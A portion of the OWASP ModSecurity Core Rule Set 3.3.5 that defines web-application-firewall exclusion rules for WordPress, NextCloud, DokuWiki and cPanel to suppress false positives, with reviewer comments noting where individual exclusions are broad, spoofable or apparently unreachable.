/wp-admin/options.php" \ "id:9002800,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:option_page "@streq general" \ "t:none,\ chain" SecRule &ARGS:option_page "@eq 1" \ "t:none,\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=931130;ARGS:home,\ ctl:ruleRemoveTargetById=931130;ARGS:siteurl" # Permalink settings # permalink_structure=/index.php/%year%/%monthnum%/%day%/%postname%/ SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \ "id:9002810,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=920230;ARGS:selection,\ ctl:ruleRemoveTargetById=920272;ARGS:selection,\ ctl:ruleRemoveTargetById=942431;ARGS:selection,\ ctl:ruleRemoveTargetById=920230;ARGS:permalink_structure,\ 
ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\ ver:'OWASP_CRS/3.3.5'" # Comments blacklist and moderation list SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ "id:9002820,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:option_page "@streq discussion" \ "t:none,\ chain" SecRule &ARGS:option_page "@eq 1" \ "t:none,\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:blacklist_keys,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:moderation_keys" # Posts/pages overview search SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \ "id:9002830,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\ ver:'OWASP_CRS/3.3.5'" # # [ Helpers ] # # /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, # admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags, # jquery-query,admin-comments,svg-painter,heartbeat,&load%5B%5D= # wp-auth-check,wp-a11y,wplink,jquery-ui-core,jquery-ui-widget, # jquery-ui-position,jquery-ui-menu,jquery-ui-autocomplete&ver=4.6.1 # # /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons, # admin-bar,buttons,media-views,common,forms,admin-menu,dashboard, # list-tables,edit,revisions,media,themes,about,nav-menu&load%5B%5D= # s,widgets,site-icon,l10n,wp-auth-check&ver=4.6.1 # # /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, # admin-bar,jquery-ui-widget,jquery-ui-position,wp-pointer, # wp-ajax-response,jquery-color,wp-lists,quicktags, # jqu&load%5B%5D=ery-query,admin-comments,jquery-ui-core, # jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore, # customize-base,customize&load%5B%5D=-loader,thickbox,plugin-install, # wp-util,wp-a11y,updates,shortcode,media-upload,svg-painter, # jquery-ui-accordion&ver=3f9999390861a0133beda3ee8acf152e SecRule 
REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \ "id:9002900,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=921180,\ ctl:ruleRemoveTargetById=920273;ARGS_NAMES:load[],\ ctl:ruleRemoveTargetById=942432;ARGS_NAMES:load[],\ ctl:ruleRemoveTargetById=942360;ARGS:load[],\ ctl:ruleRemoveTargetById=942430;ARGS:load[],\ ctl:ruleRemoveTargetById=942431;ARGS:load[],\ ctl:ruleRemoveTargetById=942432;ARGS:load[],\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-WORDPRESS-ADMIN" SecMarker "END-WORDPRESS" modsecurity-crs-3.3.5/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf000066400000000000000000000247301446122515100245230ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default NextCloud install. # They will likely work with OwnCloud too, but you may have to modify them. # The exclusions are only active if crs_exclusions_nextcloud=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. # # To relax upload restrictions for only the php files that need it, # you put something like this in crs-setup.conf: # # SecRule REQUEST_FILENAME "@rx /(?:remote.php|index.php)/" \ # "id:9003330,\ # phase:1,\ # t:none,\ # nolog,\ # pass,\ # tx.restricted_extensions='.bak/ .config/ .conf/'" # # Large uploads can be modified with SecRequestBodyLimit. 
Or they # can be more controlled by using the following: # # SecRule REQUEST_URI "@endsWith /index.php/apps/files/ajax/upload.php" \ # "id:9003610,\ # phase:1,\ # t:none,\ # nolog,\ # ctl:requestBodyLimit=1073741824" # # --------------------- SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ "id:9003000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-NEXTCLOUD" SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ "id:9003001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-NEXTCLOUD" # # [ File Manager ] # # # The web interface uploads files, and interacts with the user. SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ "id:9003100,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveByTag=attack-injection-php,\ ctl:ruleRemoveById=941000-942999,\ ctl:ruleRemoveById=951000-951999,\ ctl:ruleRemoveById=953100-953130,\ ctl:ruleRemoveById=920420,\ ctl:ruleRemoveById=920440,\ ver:'OWASP_CRS/3.3.5'" # Skip PUT parsing for invalid encoding / protocol violations in binary files. 
# Chain: method is exactly PUT and the path contains /remote.php/webdav.
# Removes the complete 920000-920999 and 932000-932999 ID ranges plus
# 921150, 930110 and 930120 for the transaction.
# NOTE(review): combined with rule 9003100 (same path, any method), a PUT to
# this path runs with most request-side CRS checks removed; confirm that
# request body size limits are still enforced for uploads.
SecRule REQUEST_METHOD "@streq PUT" \
    "id:9003105,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \
        "t:none,\
        ctl:ruleRemoveById=920000-920999,\
        ctl:ruleRemoveById=932000-932999,\
        ctl:ruleRemoveById=921150,\
        ctl:ruleRemoveById=930110,\
        ctl:ruleRemoveById=930120"

# Allow the data type 'text/vcard'
# Appends ' |text/vcard|' to tx.allowed_request_content_type for any path
# containing /remote.php/dav/files/.
SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
    "id:9003110,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'"

# Allow the data type 'application/octet-stream'
# Chain: method is PUT or MOVE and the path matches
# /remote.php/dav/files/ or /remote.php/dav/uploads/.
SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \
    "id:9003115,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \
        "setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'"

# Allow data types like video/mp4
# Chain: PUT to /public.php/webdav/ or /remote.php/dav/uploads/ removes
# 920340 and 920420 instead of extending the allowed content-type list, so
# any Content-Type value is accepted on these two paths.
SecRule REQUEST_METHOD "@streq PUT" \
    "id:9003116,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \
        "ctl:ruleRemoveById=920340,\
        ctl:ruleRemoveById=920420"

# Allow characters like /../ in files.
# Allow all kind of filetypes.
# Allow source code.
# NOTE(review): applies to every method on paths containing
# /remote.php/dav/files/; the 930100-930110 removal switches off the
# '/../' checks named above for the whole request, not only for the
# uploaded file content.
SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
    "id:9003120,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveById=930100-930110,\
    ctl:ruleRemoveById=951000-951999,\
    ctl:ruleRemoveById=953100-953130,\
    ctl:ruleRemoveById=920440,\
    ver:'OWASP_CRS/3.3.5'"

# Allow REPORT requests without Content-Type header (at least the iOS app does this)
# This rule carries no ver: action, unlike its neighbours.
SecRule REQUEST_METHOD "@streq REPORT" \
    "id:9003121,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    chain"
    SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
        "t:none,\
        ctl:ruleRemoveById=920340"

# [ Searchengine ]
#
# NextCloud uses a search field for filename or content queries.
# Only the 'query' argument is exempted (target removal), and only from the
# attack-injection-php tag and the 941000-942999 / 932000-932999 ranges;
# other arguments on this path stay fully inspected.
SecRule REQUEST_FILENAME "@contains /index.php/core/search" \
    "id:9003125,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\
    ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\
    ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\
    ver:'OWASP_CRS/3.3.5'"

# [ DAV ]
#
# NextCloud uses DAV methods with index.php and remote.php to do many things
# The default ones in ModSecurity are: GET HEAD POST OPTIONS
#
# Looking through the code, and via testing, I found these:
#
# File manager: PUT DELETE MOVE PROPFIND PROPPATCH
# Calendars: REPORT
# Others in the code or js files: PATCH MKCOL MOVE TRACE
# Others that I added just in case, and they seem related:
# CHECKOUT COPY LOCK MERGE MKACTIVITY UNLOCK.
#
# NOTE(review): the list below is appended for every path under
# remote.php/, index.php/ and public.php/. It includes TRACE and several
# methods the comment above describes as added "just in case"; trimming it
# to the methods the deployment actually uses keeps the method allow-list
# meaningful. 'jsonp' is not an HTTP method name - confirm why it is listed.
SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \
    "id:9003130,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'"

# We need to allow DAV methods for sharing files, and removing shares
# DELETE - when the share is removed
# PUT - when setting a password / expiration time
SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \
    "id:9003140,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'"

# [ Preview and Thumbnails ]
# Exempts only ARGS:file from rule 932150.
SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \
    "id:9003150,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetById=932150;ARGS:file,\
    ver:'OWASP_CRS/3.3.5'"

# Filepreview for trashbin
SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview.php" \
    "id:9003155,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetById=932150;ARGS:file,\
    ctl:ruleRemoveTargetById=942190;ARGS:file,\
    ver:'OWASP_CRS/3.3.5'"

# Gallery thumbnails and logout: exempts ARGS:requesttoken from rule 941120.
SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \
    "id:9003160,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\
    ver:'OWASP_CRS/3.3.5'"

# [ Ownnote ]
# Removes rule 941150 entirely (all targets) for paths containing
# /index.php/apps/ownnote/.
SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \
    "id:9003300,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveById=941150,\
    ver:'OWASP_CRS/3.3.5'"

# [ Text Editor ]
#
# This file can save anything, and its name could be lots of things.
#
# ARGS:filecontents is exempted from every rule tagged OWASP_CRS, and the
# 920370-920390 rules are also detached from ARGS_COMBINED_SIZE on this
# path.
# NOTE(review): whatever is saved through this endpoint is not inspected by
# CRS at all; the only condition is the path substring.
SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \
    "id:9003310,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filecontents,\
    ctl:ruleRemoveTargetById=921110-921160;ARGS:filecontents,\
    ctl:ruleRemoveTargetById=932150;ARGS:filename,\
    ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\
    ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\
    ver:'OWASP_CRS/3.3.5'"

# [ Address Book ]
#
# Allow the data type 'text/vcard'
SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \
    "id:9003320,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'"

# Allow modifying contacts via the web interface
# Chain: PUT to a path containing /remote.php/dav/addressbooks/ removes
# rule 200002. That ID is outside the CRS ranges used in this file.
# NOTE(review): presumably the request-body parse-error rule from the base
# ModSecurity configuration - confirm against the local modsecurity.conf.
SecRule REQUEST_METHOD "@streq PUT" \
    "id:9003321,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    chain"
    SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \
        "t:none,\
        ctl:ruleRemoveById=200002"

# [ Calendar ]
#
# Allow the data type 'text/calendar'
# NOTE(review): the crs-setup.conf example in this file's header comment
# (relaxing tx.restricted_extensions) also uses id:9003330; copying that
# example unchanged would define the same rule ID twice.
SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \
    "id:9003330,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'"

# Allow modifying calendar events via the web interface
# Same shape as rule 9003321, for the calendars path.
SecRule REQUEST_METHOD "@streq PUT" \
    "id:9003331,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    chain"
    SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \
        "t:none,\
        ctl:ruleRemoveById=200002"

# [ Notes ]
#
# We want to allow a lot of things as the user is
# allowed to note on anything.
SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \ "id:9003340,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveByTag=attack-injection-php,\ ver:'OWASP_CRS/3.3.5'" # [ Bookmarks ] # # Allow urls in data. SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \ "id:9003350,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=931130,\ ver:'OWASP_CRS/3.3.5'" # # [ Login forms ] # # This removes checks on the 'password' and related fields: # User login password. SecRule REQUEST_FILENAME "@contains /index.php/login" \ "id:9003400,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ ver:'OWASP_CRS/3.3.5'" # Reset password. SecRule REQUEST_FILENAME "@endsWith /index.php/login" \ "id:9003410,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq resetpass" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" # Change Password and Setting up a new user/password SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \ "id:9003500,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-NEXTCLOUD-ADMIN" SecMarker "END-NEXTCLOUD" modsecurity-crs-3.3.5/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf000066400000000000000000000173241446122515100244060ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. 
# # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default Dokuwiki install. # The exclusions are only active if crs_exclusions_dokuwiki=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. # # Note, if you want to relax the upload restrictions, # see rule 900240. For Dokuwiki you can limit the exception # to the ajax.php file: # # SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" ... # SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ "id:9004000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DOKUWIKI" SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ "id:9004001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DOKUWIKI" # # -=[ Dokuwiki Front-End ]=- # # Note on files specified: # /doku.php: shows pages, saves, edits, admin # /lib/exe/ajax.php: autosave, uploads # # Allow pages to be edited, and ajax to save drafts. # # ARGS 'wikitext', 'suffix', and 'prefix' must allow the same things, # as the page (in part or whole) is passed via 'suffix/prefix' at times. # attack-protocol (921110-921160/920230): Allows odd characters on the page. # CRS: (still need attack-protocol specified.) # attack-injection-php (930000-933999): Allows code on page. # attack-sqli (940000-942999): Allows SQL expressions on page. # # Others: # 930100-930110;REQUEST_BODY: if there's a /../ in the text. # # ARGS:summary (the text in the 'summary' box on page edits.): # Allowing 930120-930130 lets user save summaries with # system file names. This should not be needed in normal # use. 
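# But leaving a note here of how to allow in rule below:
#    ctl:ruleRemoveTargetById=930120;ARGS:summary
#    ctl:ruleRemoveTargetById=930130;ARGS:summary
#
# Also, can't specify:
#    SecRule ARGS:do "@streq edit" \
#    SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php"\
#  because at times the do=edit can get dropped, so if we use
#  above the edit will get blocked when the page is saved.
# Hint: those using .htaccess rewrites can remove/replace
#  this first 'SecRule...' line with 'SecAction \' (unsupported).
#
# Chain: path ends in /doku.php or /lib/exe/ajax.php, method is POST, and a
# cookie whose name matches S?DW[a-f0-9]+ is present with a value starting
# with one of the listed characters. On a match, ARGS:wikitext, ARGS:suffix
# and ARGS:prefix are exempted from every rule tagged OWASP_CRS or
# attack-protocol, and REQUEST_BODY from 930100-930110.
# The dots in the path regex are escaped so that only the literal file
# names match; unescaped, '.' accepted any character in that position.
# NOTE(review): the cookie condition only shows that a DokuWiki-style cookie
# was sent. Name and value come from the client and the value regex is not
# anchored at the end, so it is not evidence of a logged-in session.
SecRule REQUEST_FILENAME "@rx (?:/doku\.php|/lib/exe/ajax\.php)$" \
    "id:9004100,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REQUEST_METHOD "@streq POST" \
        "t:none,\
        chain"
        SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
            "t:none,\
            ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:wikitext,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:wikitext,\
            ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:suffix,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:suffix,\
            ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:prefix,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:prefix,\
            ctl:ruleRemoveTargetById=930100-930110;REQUEST_BODY"

# Allow it to upload files. But check for cookies just to make sure.
#
# Same method and cookie conditions as rule 9004100, limited to
# /lib/exe/ajax.php; noauditlog is set in addition to nolog.
# NOTE(review): the value appended here is '|application/octet-stream' with
# no leading space and no closing '|', while the NextCloud exclusion rules
# in this rule set append ' |type|'. Confirm which form the content-type
# check expects; if it needs the delimited form this setvar has no effect.
SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \
    "id:9004110,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    noauditlog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REQUEST_METHOD "@streq POST" \
        "t:none,\
        chain"
        SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
            "t:none,\
            setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type}|application/octet-stream'"

# Show the index, even if things like "postgresql" or other things show up.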
# Chain: path ends in /doku.php, do=index, and exactly one 'do' argument is
# present. Removes the response-side rules 951240 and 953110 entirely.
# The '&ARGS:do @eq 1' link stops a request from adding a second 'do'
# argument to qualify for the exclusion.
SecRule REQUEST_FILENAME "@endsWith /doku.php" \
    "id:9004130,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    noauditlog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:do "@streq index" \
        "t:none,\
        chain"
        SecRule &ARGS:do "@eq 1" \
            "t:none,\
            ctl:ruleRemoveById=951240,\
            ctl:ruleRemoveById=953110"

#
# [ Login form ]
#
# Turn off checks for password.
# Exempts only ARGS:p from rules tagged OWASP_CRS, and only when do=login
# is the single 'do' argument.
SecRule REQUEST_FILENAME "@endsWith /doku.php" \
    "id:9004200,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    noauditlog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:do "@streq login" \
        "t:none,\
        chain"
        SecRule &ARGS:do "@eq 1" \
            "t:none,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:p"

#
# [ Admin Area ]
#
# Skip this section for performance unless do=admin is in request
# One copy per phase. The condition is the request parameter only; it says
# nothing about whether the requester is a DokuWiki administrator.
SecRule ARGS:do "!@streq admin" \
    "id:9004300,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-DOKUWIKI-ADMIN"

SecRule ARGS:do "!@streq admin" \
    "id:9004310,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-DOKUWIKI-ADMIN"

# [ Reset password ]
#
# Turn off checks for pass1, pass1-text, pass2
# NOTE(review): this chain requires do=login, but it sits behind rules
# 9004300/9004310, which skip to END-DOKUWIKI-ADMIN whenever a 'do' value
# other than 'admin' is present. As written the chain looks unreachable, so
# pass1 / pass1-text / pass2 stay fully inspected; confirm the intended
# 'do' value and placement before relying on this exclusion.
SecRule REQUEST_FILENAME "@endsWith /doku.php" \
    "id:9004320,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    noauditlog,\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule ARGS:do "@streq login" \
        "t:none,\
        chain"
        SecRule &ARGS:do "@eq 1" \
            "t:none,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
            ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"

# [ Save config ]
#
# Allow the config to be saved:
#  942200: If the user adds "..."
to tagline: ARGS:config[tagline] # 942430: if ARGS:config[hidepages] has pages looking like sql statements # 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] SecRule REQUEST_FILENAME "@endsWith /doku.php" \ "id:9004370,\ phase:2,\ pass,\ t:none,\ nolog,\ noauditlog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:page "@streq config" \ "t:none,\ chain" SecRule &ARGS:page "@eq 1" \ "t:none,\ chain" SecRule REQUEST_METHOD "@streq POST" \ "t:none,\ chain" SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ "t:none,\ ctl:ruleRemoveTargetById=920230;ARGS:config[dformat],\ ctl:ruleRemoveTargetById=942200;ARGS:config[tagline],\ ctl:ruleRemoveTargetById=942430;ARGS:config[hidepages],\ ctl:ruleRemoveTargetById=942430-942440;ARGS:config[signature]" # When the config loads after a save, it gets blocked because # it has 'readdir' and lines that look like sql # 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] # 951240,953110: When the page reloads, it triggers # postgres and php code disclosure rules. SecRule REQUEST_FILENAME "@endsWith /doku.php" \ "id:9004380,\ phase:2,\ pass,\ t:none,\ nolog,\ noauditlog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:page "@streq config" \ "t:none,\ chain" SecRule &ARGS:page "@eq 1" \ "t:none,\ chain" SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ "t:none,\ ctl:ruleRemoveById=951240,\ ctl:ruleRemoveById=953110" # End [ Admin Area ] SecMarker "END-DOKUWIKI-ADMIN" SecMarker "END-DOKUWIKI" modsecurity-crs-3.3.5/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf000066400000000000000000000036321446122515100241200ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. 
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------

# These exclusions remedy false positives in a default cPanel environment.
# The exclusions are only active if crs_exclusions_cpanel=1 is set.
# See rule 900130 in crs-setup.conf.example for instructions.

# Gate, one copy per phase: when tx.crs_exclusions_cpanel is unset or 0,
# skip to the END-CPANEL marker.
SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \
    "id:9005000,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-CPANEL"

SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \
    "id:9005001,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-CPANEL"

#
# [ cPanel whm-server-status ]
#
# Cpanel's WHM auto generates requests to /whm-server-status from
# 127.0.0.1 (triggers rule 920280, non-blocking, log only) Once every 5 minutes.
# These false positives have a low impact (logged, non-blocking) to a large number of users (all cPanel admins).
#

#
# Rule to allow cPanel whm-server-status requests from localhost without log entry.
#
# Chain: the full request line must be a GET for /whm-server-status
# (optionally followed by '/' or '/?auto') and the peer address must be
# 127.0.0.1 or ::1. The chained rule removes 920350 as well as 920280; only
# 920280 is mentioned in the description above.
# NOTE(review): REMOTE_ADDR is the connecting peer. Where a reverse proxy on
# the same host forwards client traffic to this server, forwarded requests
# also arrive from loopback - confirm the topology before enabling.
SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$" \
    "id:9005100,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-apache',\
    tag:'attack-generic',\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
        "t:none,\
        ctl:ruleRemoveById=920280,\
        ctl:ruleRemoveById=920350"


SecMarker "END-CPANEL"
modsecurity-crs-3.3.5/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf000066400000000000000000000437461446122515100243110ustar00rootroot00000000000000
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
